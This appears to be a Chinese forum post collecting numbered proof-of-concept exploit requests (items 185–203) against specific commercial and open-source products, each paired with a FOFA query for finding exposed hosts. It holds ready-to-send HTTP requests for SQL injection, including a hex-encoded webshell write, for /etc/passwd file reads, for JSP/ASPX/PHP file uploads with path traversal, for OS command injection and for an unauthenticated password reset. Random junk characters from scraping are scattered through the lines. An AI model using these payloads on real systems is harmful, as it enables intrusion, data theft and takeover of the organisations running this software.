" Q! j7 }6 g6 A1 o' s
185. 瑞友天翼应用虚拟化系统SQL注入
4 e9 k% z# A' G& B' w0 Gversion < 7.0.5.1
. s' c! a9 {; a( ~FOFA:app="REALOR-天翼应用虚拟化系统"# H- O) E9 R& i
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
- k6 S w- s3 y. \/ y# qHost: host" t* [" p* C% S( H+ Q' I, \
8 y# a+ j, @ u: v! F
/ m l' g1 ]" V; s186. F-logic DataCube3 SQL注入
! H" p( i: b- m, e' g. PCVE-2024-31750
6 H7 P3 j( Y- s, ^' mF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
1 Z N9 w) c8 `1 k( }- y" C$ a4 PFOFA:title=="DataCube3"8 O2 v: r( t! n- E, B
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
% G/ G3 {3 n: M& nHost: your-ip
! q3 g- t8 l6 Y! U. Z, OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.06 u( Q8 p# O9 {6 ?# _/ n- B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
2 Q; {: D# z/ o \1 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& n5 u, S7 t0 F7 ` B% ?/ l6 NAccept-Encoding: gzip, deflate/ \; ]: U4 F# A& R5 N) b, N
Connection: close6 h( p5 }; T D D) X* l: G- J& ^# s
Content-Type: application/x-www-form-urlencoded0 t7 w. P% O1 e; u' J8 H
3 w3 o$ e. m% z
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
) q# N5 {( S5 I9 w6 T5 \/ h6 P M0 p1 A0 r* c2 [1 v
* ?9 V2 @# R! A; T. D8 }: I187. Mura CMS processAsyncObject SQL注入( ~$ G) ^7 P% y3 D9 p' [: K
CVE-2024-32640& v7 W: d+ e# j. C. |2 \
FOFA:"Mura CMS"
6 v, w0 a, ]4 C% l0 R- s7 K, W# SPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% A0 H/ N# ?" W( vHost: your-ip
2 _+ u" P2 |0 [+ k3 T4 cContent-Type: application/x-www-form-urlencoded2 L2 `$ l* W: M% g
4 _" v( j& I! s) N! S2 Y0 P s5 z# U
- D+ p, D$ C0 R7 y, Yobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
/ k# Z6 h4 o' g. }& s
$ I% B* I. ? Z1 C) v% J
+ K7 P# ^( Y4 e! _5 u) U1 F188. 叁体-佳会视频会议 attachment 任意文件读取
9 s2 }* M; C2 Jversion <= 3.9.7
" [- {6 e+ ]8 S; I" G7 ]FOFA:body="/system/get_rtc_user_defined_info?site_id"* f1 R3 U( t5 Q. p# t% e& F# |2 s
GET /attachment?file=/etc/passwd HTTP/1.17 [' s4 X7 @/ }( u% ~" V
Host: your-ip
# g3 e* Y' L& O$ Y1 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 t; ~% N' @. w6 Z& }- u) wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 n5 K; E) I% p6 d: p" U+ hAccept-Encoding: gzip, deflate3 `) G/ @: p% c( P( N; m2 `
Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 ~/ a9 A8 ~+ M- V1 w* L7 I( e
Connection: close
% C$ ]2 X- `( |0 C: w9 \# x+ i+ G2 Q
2 }! Q# m: o) Z3 ~+ s+ ?; C4 G7 ^% C
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
( [2 p6 u. G3 C! ~; _FOFA:app="LANWON-临床浏览系统"5 {, g( G+ X. }: U9 @
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
W! i6 a( F" E& IHost: your-ip
# e$ N+ q0 F" S! E* ~ Z- ~! RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& ]6 t0 z1 d) q d0 Q- z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ~' c r* Z( u5 WAccept-Encoding: gzip, deflate
! Y- V* \; N( h9 I" p1 ?Accept-Language: zh-CN,zh;q=0.9" N/ ~' ^# Y/ z8 _
Connection: close% O7 i6 A0 B1 a0 H( L5 ^
8 u/ i- w5 f4 `4 x3 s! n6 g
3 T6 X( d. b. S) H# A: M3 f190. 短视频矩阵营销系统 poihuoqu 任意文件读取
* J! c, f/ ?# S+ E$ JFOFA:title=="短视频矩阵营销系统"8 Z0 U$ p$ x2 a6 z
POST /index.php/admin/Userinfo/poihuoqu HTTP/2' i' _) Q, f' @1 ?6 {; a% ?
Host: your-ip) h Y1 ~% ?/ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36- ~. X" N# [; ]( F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 t9 h. L- ]5 B A4 i6 j
Content-Type: application/x-www-form-urlencoded
/ K. w/ X7 L( [1 [( PAccept-Encoding: gzip, deflate6 Q& ]3 @# ]0 f D# _0 k2 b+ s
Accept-Language: zh-CN,zh;q=0.91 s: {; Q$ ]6 N
4 w1 I; C) {, G! p- h j4 \+ B2 O
poi=file:///etc/passwd9 L4 n5 k/ l: U2 u5 ~, ^. `9 B
3 p. F: ?6 x: D7 F+ x0 S
# p3 v6 K0 a0 w( Y" F0 }7 K0 x191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
+ D( D p0 h4 p tFOFA:body="/CDGServer3/index.jsp"
5 r$ g( h a" i$ n7 w2 p uPOST /CDGServer3/js/../NavigationAjax HTTP/1.1% C8 D* N1 M0 A6 i2 v; s
Host: your-ip) v6 K1 ?0 d1 o6 V9 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. f5 [$ M: ^- b! D
Content-Type: application/x-www-form-urlencoded+ b+ b9 o R2 B/ `
/ s. r. F% p9 f) x/ d9 F
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=7 ?/ r. Q# T9 D4 w+ N$ L
* J: z7 ]2 \" S8 {2 f, x6 Y8 a2 H0 A0 j1 ~$ ?! R$ R0 K
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
2 k/ X: M& ^: kFOFA:title="用户登录_富通天下外贸ERP"/ i& S* L; Z1 j+ c* J& L
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
8 S! G0 i6 u- c% P2 v8 JHost: your-ip
2 X6 T$ [$ w5 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* S, L% u2 M; }, |7 k2 g: C& J6 z/ \5 nContent-Type: application/x-www-form-urlencoded
/ w* M2 H" s( F/ k# E
1 [8 }6 o* H/ j0 c- ^9 Q) S3 ^! q+ }" d" C9 f; x
<% @ webhandler language="C#" class="AverageHandler" %>
3 U2 [9 r. h& busing System;
% t6 \; K1 y) g2 G6 [using System.Web;
, E, e8 C# a! k' M7 _public class AverageHandler : IHttpHandler+ k; \0 |: T7 {3 R9 e
{0 f! k5 ]6 @# m5 L$ x' c
public bool IsReusable8 `* ^, z( Y( b2 s
{ get { return true; } }1 @0 p( a s% F9 S* E. D# s8 L# N
public void ProcessRequest(HttpContext ctx)
3 `! Q) N0 J; H0 e) G7 ?- s, X! t{ ~/ {5 S% B+ S
ctx.Response.Write("test");
& x$ w' s( H% p9 I* X}' s+ t* V9 v" d4 U0 Z/ W
}# t* t9 c) v, T( h2 {* R
" j; L- d8 w' D& o
( f5 a9 W" A* T$ Q% r193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行! [# W/ t6 M1 \: @3 G- S/ a" {7 Y
FOFA:body="山石云鉴主机安全管理系统". c8 h0 m5 ~) L2 I+ l. U; I
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
( B2 e2 b- G# O1 A' e) rHost:
$ y$ ~3 ^1 R" W2 k! g7 @Cookie: PHPSESSID=2333333333333;
) K7 C# T/ d6 i6 n, cContent-Type: application/x-www-form-urlencoded) W( `- U2 T O4 i7 O/ }$ S7 [
User-Agent: Mozilla/5.0" x p+ f0 C$ ^7 Y4 T3 U8 X% \' L, G
' L- n3 P' R5 b: x
) x2 Z% p+ t# v; d d) m6 X) BPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1% w0 ^8 A2 o/ q# n- D
Host:
$ h( y m. U: c0 @$ d; aUser-Agent: Mozilla/5.0
! K" B6 u5 t2 o4 u2 nAccept-Encoding: gzip, deflate
& \+ i) N. b0 ^8 q) cAccept: */*
Q Z7 L, C* p2 \' PConnection: close: W3 _3 H+ v w+ A, v2 m5 t7 d
Cookie: PHPSESSID=2333333333333;
. A0 s. R8 [* L) ^Content-Type: application/x-www-form-urlencoded
4 S% b% @+ d* X/ T7 y9 _Content-Length: 84: |; m, p7 }1 L3 q7 i% l7 _
1 L( A0 `+ H, j, g3 f* B. N2 l
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config') N3 c; |% M( K% y$ d
* t5 U6 S3 {& I. S& `
, {- O4 ]& v+ }8 h. PGET /master/img/config HTTP/1.1
6 e4 g* h5 s9 `/ ]& v4 |7 NHost:
' z1 [3 x: f2 h' U! ^# e7 }User-Agent: Mozilla/5.0
* b- I4 v# J, T! d% S N. j. C! `. B: S* K2 L3 _
8 v S8 N2 p k4 F) W" C
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& Z1 h. q; z( ]/ G5 oFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在; _6 i/ Z4 z4 F( v* b& S
; A, c& V) d% y9 J5 [% K' h0 Y9 z
POST /servlet/uploadAttachmentServlet HTTP/1.1
) h) C. v" k+ y8 I0 x0 iHost: host
$ Y v+ K9 ?& q+ B, |- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36. m {0 |3 v! M1 L8 c; _2 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% Y5 {$ P' L9 @# ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 l2 V/ b% N$ O# ]Accept-Encoding: gzip, deflate
9 [1 X8 m8 C9 {# OConnection: close
2 z8 Z- c0 n U: ~/ x! zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk: k( E3 D6 ^: S' r. b
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
& J w+ r: |5 B w
( w) q% V% y+ G0 {5 ~8 |( Y$ kContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"' R8 T$ u! q1 p) s
Content-Type: text/plain4 x6 E) ?9 k& W/ c
<% out.println("hello");%>4 R. }, |1 G0 D" v
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 u {& [' K! n9 M- |Content-Disposition: form-data; name="json"( y0 f" L k5 b2 }/ `3 v) t5 J7 Y
{"iq":{"query":{"UpdateType":"mail"}}}
" _4 W/ h# r7 D! a3 Q------WebKitFormBoundaryKNt0t4vBe8cX9rZk--$ \3 Q5 M7 _! G% T( h( {, U
% {7 x; D6 Y# a
! w4 [( v8 u/ e+ Q. a0 J1 C% j195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
2 G6 j) { h) B5 B, M" BFOFA:title=="飞鱼星企业级智能上网行为管理系统7 o. v& o1 t6 H2 |. k; A
POST /send_order.cgi?parameter=operation HTTP/1.1
% Y4 T# I) m, uHost: 127.0.0.1 z r: Z8 d5 ]
Pragma: no-cache9 V' W* G5 S7 o2 T: I
Cache-Control: no-cache
5 i$ Y" x5 a0 X; T. b7 e! M, WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.363 n! C2 A) A* Y0 q' x# _
Accept: */*
) R1 S% C5 i3 P/ CAccept-Encoding: gzip, deflate) J0 K/ r/ v) K; |6 Y& k
Accept-Language: zh-CN,zh;q=0.9
6 f1 z, w! w% Y' m* c5 z% uConnection: close1 e! P; _* U7 _2 S& b |
Content-Type: application/x-www-form-urlencoded
' k1 {3 }' t/ pContent-Length: 687 p5 n: ]0 v! @. y; |+ [+ C3 G
: F* B7 L5 O" y4 ~) k0 f5 f
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 ~# N! o m! S: j9 ?
* L/ {) [, J2 Q) N$ T
9 S/ B9 k/ ^# V0 s) i196. 河南省风速科技统一认证平台密码重置
) w$ P! W! R. ~( ]+ ?* z6 U0 Y2 zFOFA:body="/cas/themes/zbvc/js/jquery.min.js", `4 U. x- n" X, n9 g
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
( G- `- l/ D0 @, E0 I; }1 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 {% O" K3 z9 K) F
Content-Type: application/json;charset=UTF-8
7 O8 E, j5 K- h! kX-Requested-With: XMLHttpRequest) V4 P- M# l& M. o1 W* r
Host:+ c5 ~% ]4 U2 D4 E4 a
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2$ a& O+ v8 P( P8 ^2 X' ~
Content-Length: 45
7 G2 F5 Y/ E3 G; u6 XConnection: close
5 L2 _, y3 ]& O8 o( W9 j/ T B5 E
. P: T+ e& Y# ?{"xgh":"test","newPass":"test666","email":""}
3 z4 s% E+ T, d* H- o. \1 R) u$ L4 S3 N
: y( ^6 d0 \) g3 H4 \& w# G. X$ f/ i, n0 {9 q2 o
3 t* n& n( x4 r8 A0 W
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入1 F G J: T( R' l- ]; q
FOFA:app="浙大恩特客户资源管理系统"
. i+ c- D. [3 V; d& q& zGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1: L, _+ l9 [2 v) F) T
Host:: i1 |! b2 i: [# G3 v. M2 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.365 x1 h! q$ S, M( L7 P5 I
Accept-Encoding: gzip, deflate1 b6 M5 a+ z; O) w
Connection: close! x5 W5 z/ w4 m2 e
U2 U8 T) M4 @+ B6 N2 [, B& x
! y3 }8 V4 z( ]5 [7 p& y
T% l) F! P! S# O) e4 l; A0 W198. 阿里云盘 WebDAV 命令注入2 r. a7 `9 G1 d! @
CVE-2024-29640
) X9 n( {8 ^4 i+ ^2 AGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
9 F/ Z- p2 W% f0 A; f8 P* n3 p8 \ FCookie: sysauth=41273cb2cffef0bb5d0653592624cf64* W' C- \ {5 ~1 x
Accept: */*/ u# _$ w; ] u3 `" K
Accept-Encoding: gzip, deflate y9 T: P) b4 q0 O/ C$ j* W0 R
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
6 A( {( t) \5 t7 [Connection: close* k5 U* K; c9 M% z
0 R$ _ W# Z7 {; y: k
2 W" J2 _% T# L! Y, B% ?199. cockpit系统assetsmanager_upload接口 文件上传
W& r6 U' S6 \& d( [% F6 r
; A& X5 `) K* D* |% W! l8 ^1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
" U9 `, l, {- d5 Q. xGET /auth/login?to=/ HTTP/1.18 M5 i; q( Q' S" Z
# q9 T- k- u! J; p5 z5 _; Q响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
7 G9 \' I3 t* J4 N* @( J" l8 u K* X$ U6 Z9 W
2.使用刚才上一步获取到的jwt获取cookie:
c: X E3 p+ ] R9 T- O' D) ~% ~" h+ u8 R" w
POST /auth/check HTTP/1.1
+ k* S- S5 @% m9 b+ jContent-Type: application/json% H% R# b+ `7 Y4 `2 ^
+ u/ W6 @$ q, _6 l( S5 B$ q
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
! {3 E* S# v+ n9 }+ T F, Q' L
7 m- i# g0 |9 v) } Q: N; ~) V响应:200,返回值:
2 U h$ o( L, n+ i% R6 p/ V- oSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=// `: b" v8 |# N) d# d6 b
Fofa:title="Authenticate Please!"% X7 G5 h3 [) E! x# A/ I
POST /assetsmanager/upload HTTP/1.15 `" }- E; w" [+ f" E
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
, F6 w8 L+ U+ V9 B/ C# y* yCookie: mysession=95524f01e238bf51bb60d77ede3bea92
N i* D) f: O, r; h# N) g' _: w' F8 q7 M* d, A
-----------------------------36D28FBc36bd6feE7Fb3
! X j' b6 X/ Y' o% z2 dContent-Disposition: form-data; name="files[]"; filename="tttt.php"% z, J! ^7 Y" |, Y( K2 z
Content-Type: text/php; D& @% _6 K6 f" E( Z/ ?
3 N1 }) t$ g/ k; X% C: F<?php echo "tttt";unlink(__FILE__);?>0 s8 u6 G3 _7 m" U; [% _
-----------------------------36D28FBc36bd6feE7Fb3
3 c T) a# B; ^* k% q' uContent-Disposition: form-data; name="folder"
3 @; W' X- j4 f2 ~0 d6 n8 p, p& U8 _) S, m$ i
-----------------------------36D28FBc36bd6feE7Fb3--; r0 V0 z0 b2 l2 |) q- g2 u
- }8 x9 d+ s9 X h" A# w8 j, U% l/ V
/storage/uploads/tttt.php# p$ Z8 k% s6 U% n) {0 q, l
5 @$ T+ O* x7 g) d$ W7 {/ |200. SeaCMS海洋影视管理系统dmku SQL注入
; o4 U( p* X5 ~: \. lFOFA:app="海洋CMS"9 t) r1 D x- S( K( y" `
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.13 q/ z8 d1 _0 i t4 Z: f: @
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
2 C" R3 E% h$ A5 KUpgrade-Insecure-Requests: 1" J4 r6 G" n* ?1 h! [
Cache-Control: max-age=0
: ^: {; ~4 r: u8 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 \" [. M7 v, T) l4 h
Accept-Encoding: gzip, deflate# y3 u1 p7 `: V+ l- _7 D. o
Accept-Language: zh-CN,zh;q=0.9! T* m+ c1 W% j& W$ V2 {7 _. Z
+ s6 A6 P5 n% l# v/ Q
" P! q9 C: @/ U; |( k2 {6 m" L& l201. 方正全媒体新闻采编系统 binary SQL注入
) u. a1 f( t; T; ~& W7 r; CFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
7 @. V! a% [/ y+ ~- U# a* |! vPOST /newsedit/newsplan/task/binary.do HTTP/1.1
; K: I3 @" t& G2 Y4 EContent-Type: application/x-www-form-urlencoded
" O- O, h0 m) vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 _" \5 A8 U6 {9 W& _& @Accept-Encoding: gzip, deflate
5 T, r+ F a7 F. H) [" i6 O3 rAccept-Language: zh-CN,zh;q=0.9
1 }6 z' U2 V! Y; O+ ~, hConnection: close
. T0 W! W0 l2 x$ A% K/ t6 V( d( l) j1 p
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1+ B( X+ O" V3 [& t- n( \& c
# ]7 N$ m, Q. k7 ?& w
1 S& p6 U$ t! y) k202. 微擎系统 AccountEdit任意文件上传
" L0 N1 j4 F, b( Q: F) u NFOFA:body="/Widgets/WidgetCollection/") d8 F1 l. ?: i- i! N4 p
获取__VIEWSTATE和__EVENTVALIDATION值
3 o8 J; d4 L+ j8 L& k* G, v2 qGET /User/AccountEdit.aspx HTTP/1.1
+ J* s8 j6 `3 E- Y$ z$ x* AHost: 滑板人之家
1 r4 N9 k( A4 ]9 w4 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.310 z$ k) s5 Y! a0 G9 s
Content-Length: 0
; n0 ~: ~3 l( B2 Q
0 \- \& | t. x5 i* N3 V: Q% J0 ]% \$ e6 ? \; i! [
替换__VIEWSTATE和__EVENTVALIDATION值
0 W0 x2 [" x C8 W) Q. Y0 O/ ^POST /User/AccountEdit.aspx HTTP/1.1+ r2 |3 F! M! ?1 @
Accept-Encoding: gzip, deflate, br1 g. H' n- A3 d, D. o7 ^5 d
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
2 {3 f: T2 r6 w" o. K3 X
9 U2 b$ `+ s S" s( F* J-----------------------------786435874t38587593865736587346567358735687
5 C; D; u8 t) K mContent-Disposition: form-data; name="__VIEWSTATE") L' H. `4 _: @4 @& N* X
& Q' k6 h! P$ c- w- n" S
__VIEWSTATE
0 G3 }: c" \& h' O: m-----------------------------786435874t38587593865736587346567358735687
* \9 H. P! T; ^: o7 v% J' ZContent-Disposition: form-data; name="__EVENTVALIDATION"( u! }: F) p0 H. o' q
7 Z) Z. h0 J( X" o8 I/ U2 N. \: e. z: G__EVENTVALIDATION
5 |2 }4 c$ z& z6 V H1 @-----------------------------786435874t38587593865736587346567358735687
( m9 u" J) u: FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"% `. a5 t, h2 I( `0 ?- {
Content-Type: text/plain# u! {2 e N- m+ _; H9 L4 A/ F3 X2 R3 ?
+ @* w3 ^0 v- |; {% X% ]Hello World!
2 @9 [1 d# c: C* {-----------------------------786435874t38587593865736587346567358735687, D- b$ v: R8 Y8 K( P' f
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 P, G+ c) S: s* q6 ?
- _) h2 |& O* q+ V3 Z上传图片
% L9 q: V- [) P8 e Q! R& ?4 R-----------------------------786435874t38587593865736587346567358735687
( |# S5 Q% K0 CContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"+ @, u: K& ?$ Y4 P2 K0 `
$ V5 @, W: L0 T6 Y+ T x' g! A7 W0 B9 e$ ^) Q
-----------------------------786435874t38587593865736587346567358735687
3 t2 Y" M7 J; |! B$ N. UContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"2 t2 k2 t; k" Z+ c% o
0 s& s' ~* d) z5 l. y
* l# v% m* J* M! c D& M5 m: h' P: h
-----------------------------786435874t38587593865736587346567358735687--: W8 C* D+ D! i$ R8 `6 ?1 G8 s; Y
3 r. L) `3 ~/ e2 B I9 M5 @/ c% F0 P: G2 x
/_data/Uploads/1123.txt8 i4 o3 _& K' R, O
5 A% b4 s) b6 W% v; j+ H203. 红海云EHR PtFjk 文件上传- c8 S( @; M9 y) Q
FOFA:body="RedseaPlatform"; p9 Z* Z' b9 x% I5 s
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.16 P, F' R( A/ _6 o
Host: x.x.x.x
1 b& F1 k5 _' W. vAccept-Encoding: gzip
4 c' T: @9 ]& x, wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# c- f- l4 n( W3 P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
3 X0 ~# z3 X% ~, Z, {+ c; F9 kContent-Length: 210
! l+ R" K+ L# j7 D& r2 c. q- R C9 Z( P' ]; k
------WebKitFormBoundaryt7WbDl1tXogoZys4& F" d$ J2 M( S) d
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"* X7 C) o2 t+ K+ d" P4 I
Content-Type:image/jpeg% z: A& V+ w r- i" A# p. H# q2 s
4 @- O% f- z( D( ?
<% out.print("hello,eHR");%>" E2 S, }* w( \% V& U0 G: |1 q
------WebKitFormBoundaryt7WbDl1tXogoZys4--
5 Y2 v+ ?, ]! k. e* f
5 E6 k1 I. Q; N9 e6 o k
+ e. q. U$ D% t; B1 a
, o( @9 `/ K% d" i- {- {4 a. F; F* \8 C: ?9 y( k; x* N1 h2 q
7 W$ ~8 M* u; J6 T% e8 H% w/ y7 M/ R
g- e0 x6 W& j |
发表于 2024-6-5 14:31:29
收藏
支持
反对